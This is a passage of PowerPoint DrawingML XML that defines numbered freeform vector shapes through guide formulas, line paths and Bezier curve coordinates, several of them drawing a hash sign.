                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>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9">
                    <a:moveTo>
                      <a:pt x="188" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="68"/>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Freeform 256"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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257"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 258"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="9"/>
                <a:ext cx="154" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 145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259"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 260"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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261"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 262"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="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263"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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Freeform 264"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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265"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 266"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="0"/>
                <a:ext cx="219"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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48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09" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>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9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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7"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159"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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>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5"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="66"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="72"/>
                      <a:pt x="90" y="75"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>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70"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70"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6" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="119" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135"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2" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="41"/>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6" y="33"/>
                      <a:pt x="65" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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6"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96"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5"/>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267"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="5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Freeform 268"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="59"/>
                <a:ext cx="4" cy="2"/>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269"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 270"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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271"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 272"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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273"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 274"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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275"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 276"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 277"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 278"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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279"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="739"/>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Freeform 280"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="743"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 219"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
